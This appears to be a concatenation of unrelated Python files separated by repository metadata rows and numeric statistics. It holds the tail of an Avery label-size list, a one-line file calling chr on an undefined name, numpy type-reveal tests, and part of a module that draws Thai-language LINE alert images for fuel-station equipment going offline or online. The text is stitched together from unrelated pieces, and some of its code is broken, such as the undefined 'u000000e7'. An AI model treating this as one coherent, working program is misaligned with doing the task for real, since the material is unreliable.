{'L7996': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'L7997': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'LR3463': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'LR3475': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'LR3478': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'LR3478': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'LR3478': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'LR3655': {'id': 'LP2/210', 'shape': 'rectangle', 'number': 2, 'width': 210, 'height': 149}},
{'LR4760': {'id': 'LP7/192', 'shape': 'rectangle', 'number': 7, 'width': 192, 'height': 39}},
{'LR4761': {'id': 'LP4/192', 'shape': 'rectangle', 'number': 4, 'width': 192, 'height': 62}},
{'LR7159': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'LR7160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'LR7162': {'id': 'LP16/99', 'shape': 'rectangle', 'number': 16, 'width': 99.1, 'height': 34}},
{'LR7163': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'LR7165': {'id': 'LP8/90OV', 'shape': 'oval', 'number': 8, 'width': 90, 'height': 62}},
{'LR7165': {'id': 'LP8/99', 'shape': 'rectangle', 'number': 8, 'width': 99.1, 'height': 67.7}},
{'LR7167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'LR7168': {'id': 'LP2/195OV', 'shape': 'oval', 'number': 2, 'width': 195, 'height': 139}},
{'LR7168': {'id': 'LP2/199', 'shape': 'rectangle', 'number': 2, 'width': 199.6, 'height': 143.5}},
{'LR7651': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'M3483': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'M3490': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'M8167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'M8359': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'M8360': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'MP7160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'MP7163': {'id': 'LP14/99', 'shape': 'rectangle', 'number': 14, 'width': 99.1, 'height': 38.1}},
{'S161006R': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
]
"""
from avery import labels
for l in labels:
#print l.keys(), l.values()[0].keys()
if 'width' not in l.values()[0].keys():
print l.keys()
"""
| 96.40812 | 102 | 0.516191 | 5,848 | 45,119 | 3.982045 | 0.088406 | 0.247992 | 0.328939 | 0.082063 | 0.894576 | 0.886804 | 0.886804 | 0.880663 | 0.880663 | 0.880663 | 0 | 0.178666 | 0.152486 | 45,119 | 467 | 103 | 96.614561 | 0.43032 | 0.000931 | 0 | 0.004386 | 0 | 0 | 0.452313 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
823d772ef5fa06975d30787e4a25e0cf2806436a | 27 | py | Python | atten3.py | SathmanGazi/Python- | ae170110d35c2eccb042375288f112ba7171d080 | [
"Apache-2.0"
] | null | null | null | atten3.py | SathmanGazi/Python- | ae170110d35c2eccb042375288f112ba7171d080 | [
"Apache-2.0"
] | null | null | null | atten3.py | SathmanGazi/Python- | ae170110d35c2eccb042375288f112ba7171d080 | [
"Apache-2.0"
] | null | null | null |
print(chr(u000000e7))
| 6.75 | 22 | 0.62963 | 3 | 27 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0.222222 | 27 | 3 | 23 | 9 | 0.47619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
82450dfaf8857de6db94ebf43cd002fd4821edbe | 2,848 | py | Python | tests/reveal/fromnumeric.py | analog-garage/numpy-stubs | 201115370a0c011d879d69068b60509accc7f750 | [
"BSD-3-Clause"
] | null | null | null | tests/reveal/fromnumeric.py | analog-garage/numpy-stubs | 201115370a0c011d879d69068b60509accc7f750 | [
"BSD-3-Clause"
] | null | null | null | tests/reveal/fromnumeric.py | analog-garage/numpy-stubs | 201115370a0c011d879d69068b60509accc7f750 | [
"BSD-3-Clause"
] | null | null | null | """Tests for :mod:`numpy.core.fromnumeric`."""
import numpy as np
A = np.array(True, ndmin=2, dtype=bool)
B = np.array(1.0, ndmin=2, dtype=np.float32)
A.setflags(write=False)
B.setflags(write=False)
a = np.bool_(True)
b = np.float32(1.0)
c = 1.0
reveal_type(np.take(a, 0)) # E: numpy.bool_
reveal_type(np.take(b, 0)) # E: numpy.float32
reveal_type(
np.take(c, 0) # E: Union[numpy.generic, datetime.datetime, datetime.timedelta]
)
reveal_type(
np.take(A, 0) # E: Union[numpy.generic, datetime.datetime, datetime.timedelta]
)
reveal_type(
np.take(B, 0) # E: Union[numpy.generic, datetime.datetime, datetime.timedelta]
)
reveal_type(
np.take( # E: Union[numpy.generic, datetime.datetime, datetime.timedelta, numpy.ndarray]
A, [0]
)
)
reveal_type(
np.take( # E: Union[numpy.generic, datetime.datetime, datetime.timedelta, numpy.ndarray]
B, [0]
)
)
reveal_type(np.reshape(a, 1)) # E: numpy.ndarray
reveal_type(np.reshape(b, 1)) # E: numpy.ndarray
reveal_type(np.reshape(c, 1)) # E: numpy.ndarray
reveal_type(np.reshape(A, 1)) # E: numpy.ndarray
reveal_type(np.reshape(B, 1)) # E: numpy.ndarray
reveal_type(np.choose(a, [True])) # E: numpy.bool_
reveal_type(np.choose(b, [1.0])) # E: numpy.float32
reveal_type(
np.choose( # E: Union[numpy.generic, datetime.datetime, datetime.timedelta]
c, [1.0]
)
)
reveal_type(np.choose(A, [True])) # E: numpy.ndarray
reveal_type(np.choose(B, [1.0])) # E: numpy.ndarray
reveal_type(np.repeat(a, 1)) # E: numpy.ndarray
reveal_type(np.repeat(b, 1)) # E: numpy.ndarray
reveal_type(np.repeat(c, 1)) # E: numpy.ndarray
reveal_type(np.repeat(A, 1)) # E: numpy.ndarray
reveal_type(np.repeat(B, 1)) # E: numpy.ndarray
# TODO: Add tests for np.put()
reveal_type(np.swapaxes(A, 0, 0)) # E: numpy.ndarray
reveal_type(np.swapaxes(B, 0, 0)) # E: numpy.ndarray
reveal_type(np.transpose(a)) # E: numpy.ndarray
reveal_type(np.transpose(b)) # E: numpy.ndarray
reveal_type(np.transpose(c)) # E: numpy.ndarray
reveal_type(np.transpose(A)) # E: numpy.ndarray
reveal_type(np.transpose(B)) # E: numpy.ndarray
reveal_type(np.partition(a, 0)) # E: numpy.ndarray
reveal_type(np.partition(b, 0)) # E: numpy.ndarray
reveal_type(np.partition(c, 0)) # E: numpy.ndarray
reveal_type(np.partition(A, 0)) # E: numpy.ndarray
reveal_type(np.partition(B, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(a, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(b, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(c, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(A, 0)) # E: numpy.ndarray
reveal_type(np.argpartition(B, 0)) # E: numpy.ndarray
reveal_type(np.sort(A, 0)) # E: numpy.ndarray
reveal_type(np.sort(B, 0)) # E: numpy.ndarray
reveal_type(np.argsort(A, 0)) # E: numpy.ndarray
reveal_type(np.argsort(B, 0)) # E: numpy.ndarray
| 33.116279 | 93 | 0.687149 | 475 | 2,848 | 4.023158 | 0.094737 | 0.225013 | 0.270016 | 0.308216 | 0.880167 | 0.871795 | 0.861852 | 0.810047 | 0.661957 | 0.63056 | 0 | 0.023237 | 0.138694 | 2,848 | 85 | 94 | 33.505882 | 0.755809 | 0.387289 | 0 | 0.115942 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0 | false | 0 | 0.014493 | 0 | 0.014493 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ec0f5398908a3bd8e3d858fa645670f55adba148 | 30,017 | py | Python | linebot/creating_picture_for_line_notify.py | ThebiggunSeeoil/VIS-MASTER | a54a5f321cfe8b258bacc25458490c5b154edf19 | [
"MIT"
] | null | null | null | linebot/creating_picture_for_line_notify.py | ThebiggunSeeoil/VIS-MASTER | a54a5f321cfe8b258bacc25458490c5b154edf19 | [
"MIT"
] | null | null | null | linebot/creating_picture_for_line_notify.py | ThebiggunSeeoil/VIS-MASTER | a54a5f321cfe8b258bacc25458490c5b154edf19 | [
"MIT"
] | null | null | null | import io
import urllib.parse
import sys
import time
import datetime
import os
from PIL import Image, ImageDraw, ImageFont
class creating_picture_for_line_notify():
def CreatingPictureForVis(device,line_data,site_profile,Status):
print ('driver is',device)
if device == 'VIS' :
if Status == 'OFF-LINE':
Header_type = 'VIS : OFFLINE'
Header_IP_TYPE = 'VIS : IP '
Status = 'OFF-LINE'
color_status = 'rgb(255,0,0)'
elif Status == 'ON-LINE':
Header_type = 'VIS : ONFLINE'
Header_IP_TYPE = 'VIS : IP '
Status = 'ON-LINE'
color_status = 'rgb(124,252,0)'
print ('header is',Header_type)
if Status == 'OFF-LINE' :
result_site = site_profile # รับค่า return มาจาก linebot/connect_db_profile/get_site_profile ใน index ที่ 0
day_loss = line_data[0] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 0
hours_loss = line_data[1] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 1
minutes_loss = line_data[2] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 2
datetime_now = line_data[3] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 3
VIS_last_time = line_data[4] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 4
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((490,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.station_ip), fill=color, font=fnt_report_name)
draw.text((140,780), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,780), Status, fill=color_status, font=fnt_report_name)
draw.text((140,880), 'ติดต่อไม่ได้เมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 880), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140,980), 'ติดต่อได้ครั้งล่าสุด ' , fill=color, font=fnt_report_name)
draw.text((980, 980), str(VIS_last_time), fill=color, font=fnt_report_name)
draw.text((140,1080), 'ขาดการติดต่อนาน ' , fill=color, font=fnt_report_name)
draw.text((890, 1080), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1180), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1180), str('คุณ : '+result_site.site.team_support.team_name), fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +'dt_save'+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
elif Status == 'ON-LINE' :
result_site = site_profile # รับค่า return มาจาก linebot/connect_db_profile/get_site_profile ใน index ที่ 0
day_loss = line_data[0] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 0
hours_loss = line_data[1] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 1
minutes_loss = line_data[2] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 2
datetime_now = line_data[3] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 3
VIS_last_time = line_data[4] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 4
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((490,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.station_ip), fill=color, font=fnt_report_name)
draw.text((140,780), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,780), Status, fill=color_status, font=fnt_report_name)
draw.text((140,880), 'ติดต่อไม่ได้เมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 880), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140,980), 'ติดต่อได้แล้วเมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 980), str(VIS_last_time), fill=color, font=fnt_report_name)
draw.text((140,1080), 'ขาดการติดต่อรวม ' , fill=color, font=fnt_report_name)
draw.text((890, 1080), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1180), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1180), str('คุณ : '+result_site.site.team_support.team_name), fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +'dt_save'+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
def CreatingPictureForMWGT(device,line_data,site_profile,Status):
print ('driver is',device)
if device == 'MWGT' :
if Status == 'OFF-LINE':
Header_type = 'MWGT : OFFLINE'
Header_IP_TYPE = 'MWGT : IP '
Status = 'OFF-LINE'
color_status = 'rgb(255,0,0)'
elif Status == 'ON-LINE':
Header_type = 'MWGT : ONLINE'
Header_IP_TYPE = 'MWGT : IP '
Status = 'ON-LINE'
color_status = 'rgb(124,252,0)'
if Status == 'OFF-LINE' :
result_site = site_profile[1] # รับค่า return มาจาก linebot/connect_db_profile/get_site_profile ใน index ที่ 0
day_loss = line_data[0] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 0
hours_loss = line_data[1] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 1
minutes_loss = line_data[2] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 2
datetime_now = line_data[3] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 3
VIS_last_time = line_data[4] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 4
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((490,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,780), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,780), Status, fill=color_status, font=fnt_report_name)
draw.text((140,880), 'ติดต่อไม่ได้เมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 880), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140,980), 'ติดต่อได้ครั้งล่าสุด ' , fill=color, font=fnt_report_name)
draw.text((980, 980), str(VIS_last_time), fill=color, font=fnt_report_name)
draw.text((140,1080), 'ขาดการติดต่อนาน ' , fill=color, font=fnt_report_name)
draw.text((890, 1080), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1180), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1180), str('คุณ : '+result_site.site.team_support.team_name), fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'MWGT-OFFLINE-' +dt_save+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
elif Status == 'ON-LINE' :
result_site = site_profile # รับค่า return มาจาก linebot/connect_db_profile/get_site_profile ใน index ที่ 0
day_loss = line_data[0] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 0
hours_loss = line_data[1] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 1
minutes_loss = line_data[2] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 2
datetime_now = line_data[3] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 3
Error_start = line_data[4] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 4
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((490,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,780), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,780), Status, fill=color_status, font=fnt_report_name)
draw.text((140,880), 'ติดต่อไม่ได้เมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 880), str(Error_start), fill=color, font=fnt_report_name)
draw.text((140,980), 'ติดต่อได้แล้วเมื่อ ' , fill=color, font=fnt_report_name)
draw.text((980, 980), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140,1080), 'ขาดการติดต่อรวม ' , fill=color, font=fnt_report_name)
draw.text((890, 1080), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1180), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1180), str('คุณ : '+result_site.site.team_support.team_name), fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'MWGT-ONLINE-' +dt_save+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
def CreatingPictureForNOZZLE(device,line_data,site_profile,Status):
print ('driver is',device)
if device == 'NOZZLE' :
if Status == 'OFF-LINE':
Header_type = 'NOZZLE : OFFLINE'
Header_IP_TYPE = 'MWGT : IP '
Status = 'OFF-LINE'
color_status = 'rgb(255,0,0)'
elif Status == 'ON-LINE':
Header_type = 'NOZZLE : ONLINE'
Header_IP_TYPE = 'MWGT : IP '
Status = 'ON-LINE'
color_status = 'rgb(124,252,0)'
if Status == 'OFF-LINE' :
result_site = site_profile # รับค่า return มาจาก linebot/connect_db_profile/get_site_profile ใน index ที่ 0
day_loss = line_data[0] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 0
hours_loss = line_data[1] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 1
minutes_loss = line_data[2] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 2
datetime_now = line_data[3] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 3
Error_start = line_data[4] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 4
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((430,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,760), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,760), Status, fill=color_status, font=fnt_report_name)
draw.text((140,830), 'หน้าจ่าย : ' , fill=color, font=fnt_report_name)
draw.text((1230, 830), str(result_site.NOZZLE_pump_log_address), fill=color, font=fnt_report_name)
draw.text((140,900), 'มือจ่าย :' , fill=color, font=fnt_report_name)
draw.text((1230, 900), str(result_site.NOZZLE_num), fill=color, font=fnt_report_name)
draw.text((140,975), 'BatteryVolt. ' , fill=color, font=fnt_report_name)
draw.text((1170, 975), str(result_site.NOZZLE_Battery_Status_Volts), fill=color, font=fnt_report_name)
draw.text((140, 1050), str('SerialNo : '), fill=color, font=fnt_report_name)
draw.text((1080, 1050), str(result_site.NOZZLE_SN), fill=color, font=fnt_report_name)
draw.text((140, 1120), str('LastCon : '), fill=color, font=fnt_report_name)
draw.text((930, 1120), str(result_site.NOZZLE_Last_conn), fill=color, font=fnt_report_name)
draw.text((140, 1200), str('ติิดต่อไม่ได้เมื่อ : '), fill=color, font=fnt_report_name)
draw.text((960, 1200), str(Error_start), fill=color, font=fnt_report_name)
draw.text((140, 1280), str('ขาดการติดต่อเมื่อ : '), fill=color, font=fnt_report_name)
draw.text((960, 1280), str(datetime_now), fill=color, font=fnt_report_name)
draw.text((140, 1350), str('ขาดการติดต่อนาน : '), fill=color, font=fnt_report_name)
draw.text((890, 1350), str(day_loss)+' วัน '+str(hours_loss)+' ชม. '+ str(minutes_loss)+' นาที', fill=color, font=fnt_report_name)
draw.text((140, 1420), str('ทีมงาน : '), fill=color, font=fnt_report_name)
draw.text((920, 1420), 'คุณ : '+result_site.site.team_support.team_name, fill=color, font=fnt_report_name)
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
# path_save = 'line_folder/picture_for_send/'+ 'MWGT-OFFLINE-' +dt_save+'.jpg'
image.save(patch_save, optimize=True, quality=20)
return (patch_save)
elif Status == 'ON-LINE' :
result_site = site_profile # รับค่า return มาจาก linebot/connect_db_profile/get_site_profile ใน index ที่ 0
day_loss = line_data[0] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 0
hours_loss = line_data[1] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 1
minutes_loss = line_data[2] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 2
datetime_now = line_data[3] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 3
Error_start = line_data[4] # รับค่า return มาจาก linebot/calculate_function/different_time_calculate โดย return มาทั้งหมด 5 index 4
dt_save = datetime.datetime.now().strftime("%d-%m-%y-%H:%M")
file_path = 'line_folder/picture_store/VIS-FORM.jpg' # Window Server
path_font_check = 'line_folder/font/THSarabunNew.ttf'
path_save_check = 'line_folder/picture_for_send/'+ 'VIS-OFFLINE-' +dt_save+'.jpg'
module_dir = os.path.dirname(__file__) # get current directory
path = os.path.join(module_dir, file_path)# Window Server
path_font = os.path.join(module_dir, path_font_check)# Window Server
patch_save = os.path.join(module_dir, path_save_check)# Window Server
image = Image.open(path)
imageSizeW, imageSizeH = image.size
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)' # black color
fnt_hardder = ImageFont.truetype(path_font, 120)
fnt_report_name = ImageFont.truetype(path_font, 70)
fnt_report_detail = ImageFont.truetype(path_font, 80)
fnt_report_sub_detail = ImageFont.truetype(path_font, 50)
draw.text((450, 300), datetime_now, fill=color, font=fnt_hardder)
draw.text((430,430), Header_type, fill=color_status, font=fnt_hardder)
draw.text((140, 620), 'สถานี : ' + result_site.site.station_name, fill=color, font=fnt_report_name)
draw.text((140,700), Header_IP_TYPE + str(result_site.site.mwgt_ip), fill=color, font=fnt_report_name)
draw.text((140,760), 'สถานะ ' , fill=color, font=fnt_report_name)
draw.text((1080,760), Status, fill=color_status, font=fnt_report_name)
draw.text((140,830), 'หน้าจ่าย : ' , fill=color, font=fnt_report_name)
draw.text((1230, 830), str(result_site.NOZZLE_pump_log_address), fill=color, font=fnt_report_name)
